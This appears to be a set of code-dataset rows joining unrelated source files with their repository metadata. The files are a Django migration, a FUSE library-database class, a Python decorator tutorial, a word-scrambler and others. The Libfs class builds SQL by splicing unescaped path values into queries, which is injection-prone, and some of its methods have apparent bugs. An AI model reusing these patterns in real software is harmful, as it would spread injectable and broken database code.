]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'xlearn_doc', u'xlearn_doc Documentation',
author, 'xlearn_doc', 'One line description of project.',
'Miscellaneous'),
] | [
"mctt90@gmail.com"
] | mctt90@gmail.com |
f5432dedbe4dfd1f02e4e3417c7a2e05a7b23d29 | 4bc8f8de7c5ce4960853349a27a66df5c6d905e9 | /nimap_Proj/clients/migrations/0001_initial.py | b540785af981421572e1fcfcd51845220555a1bd | [] | no_license | saifsayed786/Project_management_example | 6a67dd432334f5ef048ded73cb7854957bf63851 | 42d5fc3969681c3e7a89fb8542eaafdaca4fd60c | refs/heads/main | 2023-06-21T23:18:59.072640 | 2021-07-21T07:50:57 | 2021-07-21T07:50:57 | 384,954,565 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,534 | py | # Generated by Django 3.2.5 on 2021-07-09 09:53
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated initial migration: creates Client and Project tables.

    Do not hand-edit the generated operations; create a follow-up migration
    instead.
    """
    initial = True
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        migrations.CreateModel(
            name='Client',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('client_name', models.CharField(max_length=200)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('created_by', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Project',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('project_name', models.CharField(max_length=150)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now=True)),
                ('client_name', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='clientproject', to='clients.client')),
                ('createdBy', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
| [
"42892558+saifsayed786@users.noreply.github.com"
] | 42892558+saifsayed786@users.noreply.github.com |
2c8834ff912fd0b52c11a67b58347b14e20a59c2 | 18310e7bb4e7c46d7d3fd51046a5bd92ca5f9c48 | /gaping/parameters.py | 6509d009f0bbb6100dfbd4420f7302283a6bba73 | [] | no_license | shawwn/gaping | c91b6b4b2e2ef2ab6b868403f02e0e237b7b2761 | 41d477c79814b37f8a09715433c0c489a56c92d2 | refs/heads/master | 2023-03-15T05:42:37.086420 | 2021-03-16T21:21:01 | 2021-03-16T21:21:01 | 323,994,300 | 11 | 1 | null | null | null | null | UTF-8 | Python | false | false | 163 | py | import gin
import gin.tf.external_configurables
import tensorflow as tf
from .util import EasyDict
@gin.configurable
def options(**kws):
    """Gin-configurable bag of options: returns the keyword args wrapped in
    an EasyDict so values can be read as attributes."""
    return EasyDict(kws)
| [
"shawnpresser@gmail.com"
] | shawnpresser@gmail.com |
c3e44e4fb2ea664521f4b44330141e8e8974d925 | a033327958ce90eaed49dd3e12adddbc96385f4c | /Libfs/business_logic.py | f20ffd289c800f9931bb29f4078581374f5638f7 | [
"MIT"
] | permissive | cghanke/python-libfs | 623eae951791dbebc3ddd5a631522ab8bed6f24f | a6ce1b81526e30bb48b01740f425f9d059761cd9 | refs/heads/master | 2021-06-16T03:11:24.379014 | 2017-05-19T13:01:21 | 2017-05-19T13:01:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,964 | py | """
business-logic for libfs
The database contains 3 tables:
"views", "files" and "defaults".
"views" defines how the vitrual directory structure is created
"files" stores the actual information.
views has three columns:
view_name, directory_structure, filename_generator
- view_name is a string-identifier
- directory_structure is a csv-list in which order the metadata
are used to create the directory-structure.
- filename_generator is string, where %{key} is replaced by the corresponding
metadata, e.g. %{src_filename} just passes the original filename
whereas %{title} uses the title field.
"""
import errno
import logging
import os
import re
from importlib import import_module
from Libfs.misc import calltrace_logger, get_vpath_list
import json
import sys
LOGGER = logging.getLogger(__name__)
class BusinessLogic:
"""
Accessing the actual DB for the library.
"""
FILES_TABLE = "files"
VTREE_TABLE = "trees"
VIEWS_TABLE = "views"
MAGIX_TABLE = "defaults"
MAGIX_FIELD = "json"
MAGIC_KEYS = ["valid_keys", "default_view"]
DEFAULT_VIEW_NAME = "default"
SRC_FILENAME_KEY = "src_filename"
SRC_INODE_KEY = "src_inode"
UNKNOWN = "Unknown"
    @calltrace_logger
    def __init__(self, db_connection, magix=None, current_view_name=None):
        """
        Open (or create) the library database behind this filesystem.

        :param db_connection: either "<dbtype>://user:password@host/database"
            or a plain filesystem path (then treated as an sqlite3 file).
        :param magix: optional dict of magic constants; when None they are
            loaded from the database's defaults table.
        :param current_view_name: optional name of the view to activate;
            None selects DEFAULT_VIEW_NAME.

        Exits the process (sys.exit) on an unparsable connection string or
        an unsupported database backend type.
        """
        try:
            db_type, user, password, host, database = \
                re.match(r'(\S+)://(?:(.*?):(.*?))?(?:@(.*?)/)?(.*)', db_connection).groups()
        except AttributeError:
            # re.match returned None: treat a plain existing path (or a path
            # in an existing directory) as an sqlite3 database file.
            if os.path.exists(db_connection) or os.path.isdir(os.path.dirname(db_connection)):
                db_type = "sqlite3"
                user = host = password = None
                database = db_connection
            else:
                sys.stderr.write("Cannot parse db-connection string.\n")
                sys.exit(1)
        try:
            # Backends live in Libfs.<dbtype>_be and expose a db_backend class.
            db_module = import_module("Libfs.%s_be" % db_type)
            self.DB_BE = db_module.db_backend()
        except ImportError:
            sys.stderr.write("Sorry, database type %s not supported.\n" % db_type)
            sys.exit(2)
        # check if we can open the database at all.
        self.DB_BE.open(user, password, host, database)
        # check if the db contains all required tables
        if not self.check_db(): # do the tables exist?
            do_setup_db = True
            # since we are creating the db, the default view must be DEFAULT_VIEW_NAME
            assert current_view_name in [self.DEFAULT_VIEW_NAME, None]
        else:
            do_setup_db = False
        if magix is None:
            self.magix = self.get_magix_from_db()
        else:
            self.magix = magix
        if current_view_name is None:
            self.current_view_name = self.DEFAULT_VIEW_NAME
            self.current_view = self.magix["default_view"]
        else:
            self.current_view_name = current_view_name
            self.current_view = self.get_view(self.current_view_name)
        self.setup_filename_parsing()
        if do_setup_db:
            # Table creation needs current_view, so it happens only now.
            self.setup_db()
        self.metadata_plugin = import_module("Libfs.plugins.%s" % (self.magix["plugin"]))
        self.ordered_files_keys = self.DB_BE.get_columns(self.FILES_TABLE)
        self.check_tables()
        LOGGER.debug("init: self.current_view = %s", self.current_view)
        self.max_dir_level = len(self.current_view["dirtree"])
        # in-memory cache for bookkeeping
        self.vdirs = []
        self.vtree = self.generate_vtree()
        # still in operations
        # pinode_fn2srcpath_map
    @calltrace_logger
    def lookup_dir(self, vpath):
        """
        Return the inode number of a virtual directory, or False when the
        path does not exist in the current view's vtree.
        """
        @calltrace_logger
        def do_lookup_dir(vtree, vpath_list, result):
            """
            Recursively walk one directory level (db key) per call.

            NOTE(review): `result` is always True at the call site below, so
            hitting a string leaf effectively returns True — confirm whether
            string leaves were meant to be treated differently.
            """
            LOGGER.debug("do_lookup_dir: vtree=%s vpath_list=%s, result=%s",
                         vtree, vpath_list, result)
            if isinstance(vpath_list, str):
                LOGGER.debug("do_lookup_dir: encountered string.-> returning true")
                return result
            if len(vpath_list) == 0:
                LOGGER.debug("do_lookup_dir: vpath_list empty.")
                return True
            if vpath_list[0] in vtree.keys():
                return do_lookup_dir(vtree[vpath_list[0]], vpath_list[1:], result)
            else:
                return False
        if do_lookup_dir(self.vtree, get_vpath_list(vpath), True):
            result = self.get_vdir_inode(vpath)
        else:
            result = False
        return result
@calltrace_logger
def seek_vtree(self, vpath="", vpath_list=None):
"""
check, if a given vpath or vpath_list does actually exists.
"""
def do_seek_vtree(vtree, vpath_list):
"""
recursive fct to walk through the db by the current_view
"""
if len(vpath_list) == 0:
return vtree
if vpath_list[0] in vtree.keys():
return do_seek_vtree(vtree[vpath_list[0]], vpath_list[1:])
else:
sys.stderr.write("Internal Error: cannot find %s in vtree %s.\n" %
(vpath_list, vtree))
return False
if vpath != "":
vpath_list = get_vpath_list(vpath)
if vpath_list is None:
return self.vtree
if len(vpath_list) > self.max_dir_level:
raise RuntimeError("seek_vtree: len(vpath_list=%s) > self.max_dir_level=%s",
vpath_list, self.max_dir_level)
result = do_seek_vtree(self.vtree, vpath_list)
if not result:
sys.stderr.write("Internal Error: cannot find %s or %s in vtree.\n" %
(vpath, vpath_list))
return result
@calltrace_logger
def mkdir(self, vpath):
"""
add dir to vtree. It stays only in memory and will only be commited to the
db whenever a file is actually moved there.
"""
vpath_list = get_vpath_list(vpath)
dir_level = len(vpath_list) - 1
LOGGER.debug("mkdir: vpath_list=%s, dir_level=%s", vpath, dir_level)
# check validity of new metadata
key = self.current_view["dirtree"][dir_level]
value = vpath_list[-1]
LOGGER.debug("checking key=\"%s\", value=\"%s\"", key, value)
if not self.metadata_plugin.is_valid_metadata(key, value):
return -errno.EINVAL
# add this directory in the in-memory structures
LOGGER.debug("vpath_list[:-1]=%s", vpath_list[:-1])
LOGGER.debug("vtree=%s", self.vtree)
this_vtree = self.seek_vtree(vpath_list=vpath_list[:-1])
vnode = self.get_vdir_inode(vpath)
this_vtree[vpath_list[-1]] = {}
return vnode
    @calltrace_logger
    def rmdir(self, vpath):
        """
        Remove a directory from the vpath.
        Raises FUSEError(ENOTEMPTY) if the directory is not empty.

        NOTE(review): FUSEError is not among this chunk's visible imports —
        verify it is imported at module level (e.g. from llfuse/pyfuse3).
        The > 2 threshold presumably accounts for the "." and ".." entries
        returned by get_contents_by_vpath — confirm against that helper.
        """
        contents = self.get_contents_by_vpath(vpath)
        if len(contents) > 2:
            raise FUSEError(errno.ENOTEMPTY)
        return
@calltrace_logger
def get_vdir_inode(self, canon_path):
"""
put vpath in a module-local cache
"""
if not canon_path in self.vdirs:
self.vdirs.append(canon_path)
vnode = self.vdirs.index(canon_path) + 1
return vnode
@calltrace_logger
def walk_vtree(self, node):
"""
iterate tree in pre-order depth-first search order
"""
yield node
for child in node.children:
for item in self.walk_vtree(child):
yield item
@calltrace_logger
def get_magix_from_db(self):
"""
read the magic constants from the db
"""
res = self.DB_BE.execute_statment("select %s from %s" %
(self.MAGIX_FIELD, self.MAGIX_TABLE))
res = res[0][0]
magix = json.loads(res)
LOGGER.debug("magix=%s", magix)
return magix
    @calltrace_logger
    def setup_db(self):
        """
        creates a new db.
        Creates tables "views" and "files"
        Sets defaults views.
        """
        # Magic-constants table: one row holding a JSON blob.
        self.DB_BE.execute_statment("create table %s ('%s' text)" %
                                    (self.MAGIX_TABLE, self.MAGIX_FIELD))
        self.DB_BE.execute_statment("insert into %s (%s) values('%s')" %
                                    (self.MAGIX_TABLE, self.MAGIX_FIELD, json.dumps(self.magix)))
        # Views table with the default view pre-inserted as JSON.
        self.DB_BE.execute_statment("create table %s (name varchar unique, json text)" %
                                    (self.VIEWS_TABLE))
        self.DB_BE.execute_statment("insert into %s (name, json) values ('%s', '%s')" %
                                    (self.VIEWS_TABLE, self.DEFAULT_VIEW_NAME,
                                     json.dumps(self.current_view)))
        # Files table: source filename + inode plus one column per valid
        # metadata key of this library type.
        self.DB_BE.execute_statment("create table %s (%s varchar unique, %s integer unique, %s)" %
                                    (self.FILES_TABLE, self.SRC_FILENAME_KEY, self.SRC_INODE_KEY,
                                     ",".join(self.magix["valid_keys"])))
        self.DB_BE.commit()
        return
    @calltrace_logger
    def generate_vtree(self):
        """
        generate a dict representing the tree in the current view

        Rebuilds ``self.vtree`` as nested dicts from the distinct value
        combinations of the view's dirtree columns in the files table.
        """
        def build_dict(vtree, tpl):
            """
            internal recursvie helper function

            Inserts the components of ``tpl`` as nested keys into ``vtree``
            and returns the (mutated) top-level dict.
            """
            LOGGER.debug("build_vtree: %s %s", vtree, tpl)
            if len(tpl) == 0:
                return
            if not tpl[0] in vtree.keys():
                vtree[tpl[0]] = {}
            build_dict(vtree[tpl[0]], tpl[1:])
            return vtree
        self.vtree = {}
        res = self.DB_BE.execute_statment("SELECT DISTINCT %s from %s;" %
                                          (",".join(self.current_view["dirtree"]),
                                           self.FILES_TABLE))
        # NOTE(review): build_dict returns None for an empty tuple; safe
        # as long as the view's dirtree is never empty -- confirm.
        for tpl in res:
            self.vtree = build_dict(self.vtree, tpl)
        return
@calltrace_logger
def check_db(self):
"""
checks tables for exinstance.
"""
# get tables
res = self.DB_BE.execute_statment("SELECT name FROM sqlite_master WHERE type='table';")
tables = [tpl[0] for tpl in res]
for _tab in [self.VIEWS_TABLE, self.FILES_TABLE]:
if not _tab in tables:
return False
return True
    @calltrace_logger
    def check_tables(self):
        """
        check tables in database for validity.

        Exits the process (status 1) with an explanatory message on any
        mismatch between the db columns and this library type's keys.
        """
        # check FILES_TABLE for valid_keys
        # The two mandatory bookkeeping columns must always be present.
        for k in [self.SRC_FILENAME_KEY, self.SRC_INODE_KEY]:
            if not k in self.ordered_files_keys:
                sys.stderr.write("Internal Error: Mandatory key %s does not exist in db %s.\n" %
                                 (k, self.DB_BE))
                sys.stderr.write("Delete and recreate the library.\n")
                sys.exit(1)
        LOGGER.debug("self.ordered_keys=%s", self.ordered_files_keys)
        LOGGER.debug("self.magix[valid_keys]=%s", self.magix["valid_keys"])
        # Every db column (apart from the bookkeeping ones) must be a
        # valid key of this library type ...
        for k in self.ordered_files_keys:
            if k in [self.SRC_FILENAME_KEY, self.SRC_INODE_KEY]:
                continue
            if not k in self.magix["valid_keys"]:
                sys.stderr.write("Internal Error: Key %s is not valid.\n" % k)
                sys.stderr.write("Did you choose the right library-type ?\n")
                sys.stderr.write("Otherwise delete and recreate the library.\n")
                sys.exit(1)
        # ... and every valid key must have a matching db column.
        for k in self.magix["valid_keys"]:
            if not k in self.ordered_files_keys:
                sys.stderr.write("Internal Error: Valid key %s does not exist in db %s.\n" %
                                 (k, self.DB_BE))
                sys.stderr.write("Did you choose the right library-type ?\n")
                sys.stderr.write("Otherwise delete and recreate the library.\n")
                sys.exit(1)
        return
@calltrace_logger
def is_vdir(self, path):
"""
return true if we have a virtual directory
"""
# path must be canonicalized: start with a single /
vpath_list = get_vpath_list(path)
if len(vpath_list) > self.max_dir_level:
return False
LOGGER.debug("is_vdir: returning True")
return True
@calltrace_logger
def get_key_of_vpath(self, vpath):
"""
return the db field-name of this vpath
"""
vpath_list = get_vpath_list(vpath)
return self.current_view["dirtree"][len(vpath_list)]
    @calltrace_logger
    def add_entry(self, src_filename, metadata):
        """
        Adds a file-entry.

        Inserts a row for ``src_filename`` with the given metadata; falls
        back to an UPDATE when the row already exists.  ``metadata`` is
        temporarily extended with filename/inode and restored afterwards.
        """
        src_statinfo = os.stat(src_filename)
        metadata[self.SRC_FILENAME_KEY] = src_filename
        metadata[self.SRC_INODE_KEY] = src_statinfo.st_ino
        LOGGER.debug("metadata=%s", metadata)
        values = []
        for k in self.ordered_files_keys:
            try:
                # Missing keys become the UNKNOWN sentinel.
                values.append("%s" % metadata.get(k, self.UNKNOWN))
            # NOTE(review): bare except -- "%s" % x rarely fails, so this
            # branch looks unreachable; consider narrowing it.
            except:
                sys.stderr.write("Ignoring Key %s, Values %s is not a string."\
                    % (k, (metadata[k],)))
        # changing a list within a loop over itself,
        # huuu, but this should work
        # Empty strings are normalized to the UNKNOWN sentinel as well.
        for i, item in enumerate(values):
            if len(item) == 0:
                values[i] = self.UNKNOWN
        values_param_str = ",".join(["?" for x in values])
        try:
            LOGGER.debug("ordered_files_keys = %s", self.ordered_files_keys)
            query_str = "INSERT INTO %s VALUES (%s)" % (self.FILES_TABLE, values_param_str)
            self.DB_BE.execute_statment(query_str, *values)
        except self.DB_BE.IntegrityError:
            # Row already exists (unique src_filename): update it instead.
            update_str = ""
            for k in self.ordered_files_keys:
                update_str += "%s=?, " % (k)
            update_str = update_str[:-2]
            values.append(src_filename)
            query_str = "UPDATE %s SET %s WHERE src_filename=?" % (self.FILES_TABLE, update_str)
            self.DB_BE.execute_statment(query_str, *values)
        self.DB_BE.commit()
        # revert modifications to metadata
        metadata.pop(self.SRC_FILENAME_KEY)
        metadata.pop(self.SRC_INODE_KEY)
        return
@calltrace_logger
def remove_entry(self, src_filename):
"""
removes a file-entry
"""
self.DB_BE.execute_statment("DELETE from %s WHERE src_filename=?" %
(self.FILES_TABLE), src_filename)
self.DB_BE.commit()
return
@calltrace_logger
def get_entry(self, src_filename):
"""
returns the metadata to a src_filename
"""
try:
query_str = "SELECT %s FROM %s WHERE src_filename=?;" % \
(",".join(["?" for x in self.ordered_files_keys]), self.FILES_TABLE)
res = self.DB_BE.execute_statment(query_str, self.ordered_files_keys, src_filename)
return res[0]
except IndexError:
return None
    @calltrace_logger
    def update_column(self, old_vpath_list, new_vpath_list):
        """
        when renaming a vdir, we have to update all concerned rows

        Builds a WHERE clause matching the old path components and a SET
        clause for the components that changed, then updates in bulk.
        """
        assert len(old_vpath_list) == len(new_vpath_list)
        assert old_vpath_list != new_vpath_list
        where = ""
        update = ""
        for i, old_item in enumerate(old_vpath_list):
            new_item = new_vpath_list[i]
            LOGGER.debug("comparing old %s to new %s", old_item, new_item)
            where += "%s='%s' AND " % (self.current_view["dirtree"][i], old_item)
            if old_item != new_item:
                update += "%s='%s', " % (self.current_view["dirtree"][i], new_item)
        # Strip the trailing "AND " / ", " left by the loops above.
        where = where[:-len("AND ")]
        update = update[:-len(", ")]
        # NOTE(review): values are spliced into the SQL string unescaped;
        # a path component containing a quote would break (or inject into)
        # the statement -- consider parameterized queries.
        self.DB_BE.execute_statment("UPDATE %s set %s WHERE %s" % (self.FILES_TABLE, update, where))
        self.DB_BE.commit()
        return
@calltrace_logger
def get_view(self, view_name):
"""
returns the order in which virtual directories
are created.
"""
try:
res = self.DB_BE.execute_statment("select name, json from %s WHERE name='%s';" %
(self.VIEWS_TABLE, view_name))
return json.loads(res[0])
except IndexError:
return None
return
@calltrace_logger
def set_view(self, view_name, view):
"""
sets directory creation order
"""
# check if dirtree is valid
for subdir in view["dirtree"]:
if not subdir in self.magix["valid_keys"]:
raise RuntimeError("set_view: Key %s is not valid." % subdir)
self.DB_BE.execute_statment("insert into %s (name, json) values (%s, '%s')" %
(self.VIEWS_TABLE, view_name, json.dumps(view)))
self.DB_BE.commit()
return
@calltrace_logger
def get_all_src_names(self):
"""
return list of all src_names in db
"""
res = self.DB_BE.execute_statment("SELECT %s FROM %s;" %
(self.SRC_FILENAME_KEY, self.FILES_TABLE))
return [tpl[0] for tpl in res]
@calltrace_logger
def get_srcfilename_by_srcinode(self, inode):
"""
return src_filename
"""
res = self.DB_BE.execute_statment("SELECT %s FROM %s WHERE %s=%s;" %
(self.SRC_FILENAME_KEY, self.FILES_TABLE,
self.SRC_INODE_KEY, inode))
return res[0][0]
@calltrace_logger
def get_vpath_dict(self, vpath):
"""
get a dict view_level = path
"""
vpath_dict = {}
vpath_list = get_vpath_list(vpath)
for i, item in enumerate(vpath_list):
vpath_dict[self.current_view["dirtree"][i]] = item
LOGGER.debug("get_vpath_dict: %s -> %s", vpath, vpath_dict)
return vpath_dict
#
# actually used for FUSE
#
def get_gen_filename(self, src_filename):
"""
generate a virtual filename
"""
gen_fn = self.current_view["fn_gen"]
gen_fn = gen_fn.replace("%{src_filename}", os.path.basename(src_filename))
query_str = "SELECT %s FROM %s WHERE src_filename=?;" % \
(",".join(self.magix["valid_keys"]), self.FILES_TABLE)
res = self.DB_BE.execute_statment(query_str, src_filename)
all_file_keys = res[0]
LOGGER.debug("get_gen_filename src_filename:%s all_file_keys:%s",
src_filename, all_file_keys)
for i, item in enumerate(self.magix["valid_keys"]):
gen_fn = gen_fn.replace("%%{%s}" % (item), all_file_keys[i])
return gen_fn
    def setup_filename_parsing(self):
        """
        compile the regular expression for the filename parsing

        Walks the view's fn_gen template with a small state machine,
        collecting the %{key} names into ``self.fn_gen_keys`` and turning
        each placeholder into a capture group of ``self.fn_regex``.
        """
        i = 0
        inside_key = False
        this_key = ""
        self.fn_gen_keys = []
        fn_generator = self.current_view["fn_gen"]
        reg_ex = ""
        # create a regex and key mapping
        while i < len(fn_generator):
            if inside_key:
                # Inside %{...}: accumulate the key name until "}".
                if fn_generator[i] == "}":
                    inside_key = False
                    self.fn_gen_keys.append(this_key)
                else:
                    this_key += fn_generator[i]
                i += 1
                continue
            if fn_generator[i] == "%":
                try:
                    if fn_generator[i+1] == "{":
                        # Placeholder start: emit a capture group.
                        inside_key = True
                        i += 2
                        this_key = ""
                        reg_ex += "(.*)"
                        continue
                except IndexError:
                    # "%" was the last character: treat it literally.
                    pass
            # NOTE(review): literal template characters are appended to
            # the pattern unescaped; regex metacharacters in fn_gen (e.g.
            # ".") would be interpreted -- confirm this is acceptable.
            reg_ex += fn_generator[i]
            i += 1
        self.fn_regex = re.compile(reg_ex)
        return
@calltrace_logger
def get_metadata_from_gen_filename(self, gen_filename):
"""
return a metadata-dict from a virtual filename
"""
try:
values = self.fn_regex.match(gen_filename).groups()
except AttributeError:
raise RuntimeError("get_metadata_from_gen_filename: "\
"Given filename does not match pattern %s" % self.fn_regex.pattern)
if len(values) != len(self.fn_gen_keys):
raise RuntimeError("get_metadata_from_gen_filename: "\
"Given filename match pattern %s, but gives incorrect number of items."\
"keys %s != values %s" % (self.fn_regex.pattern, self.fn_gen_keys, values))
fn_metadata = {}
for i, item in enumerate(self.fn_gen_keys):
fn_metadata[item] = values[i]
return fn_metadata
    @calltrace_logger
    def get_contents_by_vpath(self, vpath):
        """
        returns contents of virtual directory
        files are only returned and the very leaf of the current_view
        duplicate files have a (libfs:%d) counter appended on the spot.

        :return: list of (inode, display_name, src_filename) tuples;
                 src_filename is None for directory entries.
        """
        LOGGER.debug("get_contents_by_vpath got vpath: %s", vpath)
        vpath_list = get_vpath_list(vpath)
        dir_level = len(vpath_list)
        LOGGER.debug("get_contents_by_vpath got tokens: %s", vpath_list)
        contents = []
        # add "." and ".." entries
        vnode = self.get_vdir_inode(vpath)
        contents.append((vnode, ".", None))
        if dir_level > 0:
            upper_vpath = "/".join(vpath_list[:-1])
            vnode = self.get_vdir_inode(upper_vpath)
            contents.append((vnode, "..", None))
        else:
            # At the mount root ".." points outside the filesystem.
            contents.append((-1, "..", "MOUNTPOINT_PARENT"))
        # we are at the end of the tree
        if dir_level == self.max_dir_level:
            # Leaf level: list the actual files matching every path
            # component of the view.
            # NOTE(review): the WHERE clause embeds values unescaped --
            # same injection concern as update_column.
            where = ""
            for i, item in enumerate(vpath_list):
                where += "%s='%s' AND " % (self.current_view["dirtree"][i], item)
            where = where[:-len("AND ")]
            res = self.DB_BE.execute_statment("SELECT src_inode, src_filename FROM %s WHERE %s;" %
                                              (self.FILES_TABLE, where))
            file_name_occurrences = {}
            for src_inode, src_filename in res:
                file_vname = self.get_gen_filename(src_filename)
                # Disambiguate duplicate virtual names with a counter.
                if file_vname in file_name_occurrences:
                    file_name_occurrences[file_vname] += 1
                    file_vname = "%s (libfs:%d)" % (file_vname, file_name_occurrences[file_vname])
                else:
                    file_name_occurrences[file_vname] = 0
                contents.append((src_inode, file_vname, src_filename))
        else: # in vtree
            # Intermediate level: list the child directories.
            for val in self.seek_vtree(vpath_list=vpath_list):
                # path within a vdir must not be empty,
                # otherwise it is assinged to the dirvnode of the parent vdir
                assert len(val) > 0
                contents.append((self.get_vdir_inode(os.path.join(vpath, val)), val, None))
        LOGGER.debug("get_contents_by_vpath returning: %s", contents)
        # return vnode for contents
        return contents
def get_inode_by_srcfilename(self, src_filename):
"""
return the inode from a src_filename, callend by rename
"""
res = self.DB_BE.execute_statment("SELECT src_inode FROM %s WHERE src_filename=?;" %
(self.FILES_TABLE), src_filename)
LOGGER.debug("result = %s", res)
assert len(res) == 1
return res[0][0]
| [
"github@induhviduals.de"
] | github@induhviduals.de |
4c347ae94d9df24fec3759a199a0f5795a7415fb | 3cc54ff99710605d1a142c82ca06111ad31ea544 | /Decorators.py | 46060cc330b64e15e020f3324368e3226bec8892 | [] | no_license | tombstoneghost/Python_Advance | 90caab5ca713ef928761ef5636718032f37c2037 | 45b936abd6ad76c7980dd32dabebfb81f24fd6ee | refs/heads/main | 2023-02-07T05:09:53.698323 | 2020-12-25T12:16:00 | 2020-12-25T12:16:00 | 323,593,950 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,082 | py | # Working with Decorators in Python
import functools
# Function Decorator
"""
@myDecorator
def doSomething():
pass
"""
def start_end_decorator(func):
    """
    Decorator printing 'Start' before and 'End' after each call of
    ``func`` (which is called without arguments).

    Bug fix: the original returned ``wrapper()`` -- i.e. it *called* the
    wrapper once at decoration time and rebound the decorated name to
    None.  A decorator must return the wrapper function itself.
    """
    def wrapper():
        print('Start')
        func()
        print('End')
    return wrapper
def argument_decorator(func):
    """
    Decorator printing 'Start'/'End' around calls of ``func`` while
    forwarding arbitrary positional and keyword arguments as well as the
    return value; functools.wraps preserves the wrapped metadata.
    """
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        print('Start')
        outcome = func(*args, **kwargs)
        print('End')
        return outcome
    return wrapper
# Demo: apply the no-argument decorator.  The bare 'print_name' statement
# below only evaluates the name, it does not call anything.
@start_end_decorator
def print_name():
    print('Alex')
print_name
# Function has some arguments
@argument_decorator
def add5(x):
    # Forwarded through the wrapper; the wrapper returns this result.
    return x + 5
result = add5(10)
print(result)
# Print Help of a Decorator
# help() returns None, so this prints the help text then "None".
print(help(add5))
# Class Decorator
class CountCalls:
    """Class-based decorator counting invocations of the wrapped callable."""
    def __init__(self, func):
        # Wrapped callable plus a running invocation counter, exposed as
        # the public attribute ``num_calls``.
        self.func = func
        self.num_calls = 0
    def __call__(self, *call_args, **call_kwargs):
        self.num_calls += 1
        print(f'This is executed {self.num_calls} times')
        return self.func(*call_args, **call_kwargs)
# Demo: each call increments say_hello.num_calls and prints a progress
# line before running the wrapped function.
@CountCalls
def say_hello():
    print('Hello')
say_hello()
say_hello()
say_hello()
| [
"simardeepsngh1@gmail.com"
] | simardeepsngh1@gmail.com |
23317031f4c072188b2260f3b40f58570d283aa1 | 537d2b8b23f539069d3c01aa78744086bcc88bbd | /deleteme.py | 936aaddf14f5c9e5707f542ae1131005e7ca923b | [] | no_license | michaelstreeter101/AliensAboutHumans | 2190341d9a49ad96765b72931561fac0b239c0ab | ab3b134d236a9a658b0831dc560f28226fc799bd | refs/heads/main | 2023-01-31T03:16:53.974084 | 2020-12-09T12:32:26 | 2020-12-09T12:32:26 | 319,941,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,526 | py | # Author: MWS
# Date: 2020-12-09
# Purpose: takes text typed in and converts it according to rules
# "couldnt believe that I could actually understand what I was reading" becomes
# "cdnuolt blveiee taht I cluod aulaclty uesdnatnrd waht I was rdanieg" (or similar!)
#
def shift4( w ):
    # Scramble a 4-letter chunk: emit letters in order 4th, 3rd, 1st, 2nd
    # (e.g. 'nder' becomes 'rend').
    return "".join([w[3], w[2], w[0], w[1]])
def shift3( w ):
    # Rotate a 3-letter chunk left by one (e.g. 'oul' becomes 'ulo').
    return w[1:3] + w[0]
def shift2( w ):
    # Swap two letters (e.g. 'ha' becomes 'ah').
    first, second = w[0], w[1]
    return second + first
# Main function
# Reads one sentence and re-prints it with each word's inner letters
# scrambled (first and last letter kept in place, chunks of 4/3/2
# processed right-to-left by the shift helpers).
print( 'Type a sentence' )
string = input() #string = 'This is a sentence.'
# work through the sentence, character by character,
# whenever you get to a word boundary (' ' or '.'),
# output the first letter, scrambled innards, last letter, boundary character.
# Rinse and repeat until you get to the end of the line.
# NOTE(review): a trailing word not followed by ' ' or '.' is never
# flushed/printed -- confirm this is intentional.
word=''
for char in string:
    word += char # add the next character to the word
    if ord( char ) in (32, 46): # if it's ' ' or '.' print the word
        terminator = char
        word = word[0:-1] # strip the terminator character off the word
        if len( word ) <= 3:
            print( word, end='' ) # short words (I, am, the) go through unprocessed.
            print( terminator, end='' )
            word = ''
        else: # len( word ) > 3
            first = word[0] # first letter (has to remain in the same place)
            mid = word[1:-1] # middle part of the word (will get scrambled)
            last = word[-1:] # last letter (has to remain in the same place)
            print( first, end='' )
            # Scramble mid
            # Walk 'mid' from its end, consuming chunks of 4, then 3/2/1.
            # NOTE(review): the first branch is 'if' (not 'elif'), so a
            # 4-chunk may be followed by a 3-chunk in the same pass.
            t = len( mid )
            #print( f'{t} = ', end='' )
            while t > 0:
                if t >=4:
                    dim = mid[t-4:t] # 'dim' is 'mid' rearranged
                    print( shift4( dim ), end='' )
                    t -= 4
                if t >=3:
                    dim = mid[t-3:t]
                    print( shift3( dim ), end='' )
                    t -= 3
                elif t >= 2:
                    dim = mid[t-2:t]
                    print( shift2( dim ), end='' )
                    t -= 2
                elif t >= 1:
                    print( mid[t-1:t], end='' )
                    t -= 1
            print( last, end='' )
            print(terminator, end='')
            word = ''
# Follow Aliens About Humans, @HumansExplained
| [
"noreply@github.com"
] | michaelstreeter101.noreply@github.com |
3f7dfa2439a9739f576b579721203f0a4695ae32 | e91438a38248b8c6d584617442d4494d3a36bbd9 | /server/recommendation/practice/practiceRecommendationEngine.py | 3c5d03574b541f78b75466ebf74d8a0d0833f424 | [] | no_license | Jisu-Lee/SmartVendingMachine | 85ba781be4d88ddef39b672e4ef61a22ae7eed09 | a3b538b66869911d7dcb862ce7e7c067fb57c0e4 | refs/heads/master | 2022-01-16T17:32:20.941483 | 2018-12-02T12:36:21 | 2018-12-02T12:36:21 | 151,395,001 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,872 | py | from dataSet_testRecommend import dataset
from math import sqrt
def pearson_correlation(person1,person2):
